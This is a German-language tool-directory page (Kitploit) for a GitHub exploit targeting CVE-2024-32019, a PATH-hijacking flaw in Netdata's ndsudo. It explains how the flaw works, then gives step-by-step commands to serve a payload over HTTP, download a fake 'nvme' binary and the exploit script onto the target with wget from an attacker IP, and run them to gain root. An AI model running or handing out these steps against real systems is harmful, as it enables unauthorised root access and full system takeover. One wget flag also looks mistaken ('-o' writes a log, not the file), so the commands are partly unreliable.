Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-32019-ndsudo — # Bash-basierter Privilege-Escalation-Exploit für CVE-2024-32019 im ndsudo-Tool des Netdata-Agents, der eine unsichere PATH-Suche ausnutzt, um beliebige Binärdateien mit Root-Berechtigungen auszuführen. | Kitploit
Tools/GitHubGitHub/justjoeyking/cve-2024-32019-ndsudo
Privilege EscalationSchwachstellenanalyseExploitationPost-ExploitationPenetrationstestsRed Teaming
GitHubjustjoeyking/cve-2024-32019-ndsudo

CVE-2024-32019-ndsudo

# Bash-basierter Privilege-Escalation-Exploit für CVE-2024-32019 im ndsudo-Tool des Netdata-Agents, der eine unsichere PATH-Suche ausnutzt, um beliebige Binärdateien mit Root-Berechtigungen auszuführen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
12vor 9 MonatenNoch nicht geprüft

Die ndsudo-Schwachstelle ermöglicht es einem Angreifer, Root-Berechtigungen zu erlangen, indem er einen nicht vertrauenswürdigen Suchpfad im ndsudo-Tool ausnutzt, das Teil des Netdata-Agents ist. Dies kann die Ausführung beliebiger Programme mit erhöhten Rechten ermöglichen, wenn der Angreifer eine schädliche Binärdatei in einem beschreibbaren Verzeichnis platziert und die PATH-Umgebungsvariable entsprechend ändert.

Die ndsudo-Schwachstelle, identifiziert als CVE-2024-32019, betrifft Versionen des ndsudo-Tools, die im Netdata-Agent enthalten sind, insbesondere Versionen v1.45.0 und darunter. Diese Schwachstelle ermöglicht es Angreifern, ihre Privilegien auf Systemen, auf denen das Tool installiert ist, zu erweitern.

Wie die Schwachstelle funktioniert:

Mechanismus der Ausnutzung:-

Nicht vertrauenswürdiger Suchpfad: Das ndsudo-Tool verwendet die PATH-Umgebungsvariable, um externe Befehle zu finden. Ein Angreifer kann diese Variable manipulieren, um auf ein von ihm kontrolliertes Verzeichnis zu verweisen.

Ausführung schädlicher Binärdateien: Indem der Angreifer eine ausführbare Datei mit demselben Namen wie ein Befehl, den ndsudo ausführen darf (z. B. nvme), in einem beschreibbaren Verzeichnis platziert, kann er beliebigen Code mit Root-Berechtigungen ausführen.

Angriffskomplexität:-

Geringe Komplexität: Der Angriff erfordert keine fortgeschrittenen Fähigkeiten, ein einfach erstelltes Bash-Skript kann für Privilege Escalation verwendet werden, was ihn für viele potenzielle Angreifer zugänglich macht.

Auswirkungen der Schwachstelle:-

Privilege Escalation: Eine erfolgreiche Ausnutzung ermöglicht es einem Angreifer, Root-Zugriff zu erlangen, was zur vollständigen Kontrolle über das betroffene System führen kann.

Potenzielle Risiken: Dies kann zu unbefugtem Datenzugriff, Systemmanipulation und weiterer Ausnutzung von Netzwerkressourcen führen.

PRIVILEGE ESCALATION Ich habe zwei Bash-Skripte erstellt, um einfach vom Benutzer zum Root-Zugang zu gelangen. Befolge die folgenden Schritte :-

root@kitploit:~
  git clone https://github.com/justjoeyking/CVE-2024-32019-ndsudo.git

  cd CVE-2024-32019-ndsudo

  chmod +x ndsudo_exp.sh

Erstelle nun einen Python-Server :

root@kitploit:~
  python3 -m http.server 8080

Öffne die Datei ndsudo_exploit.sh mit gedit oder pluma, je nachdem, was verfügbar ist. Du wirst den wget-Befehl wie folgt sehen :

root@kitploit:~
  wget http://10.10.14.70:8080/nvme -o /tmp/nvme

Ändere die IP-Adresse in die IP-Adresse deiner eigenen Maschine.

Gehe nun zur Zielmaschine, öffne ein Terminal und führe Folgendes aus:

root@kitploit:~
  wget http://<your-ip-addr>:8080/ndsudo_exploit.sh

  chmod +x ndsudo_exploit.sh

  ./ndsudo_exploit.sh
Tool herunterladen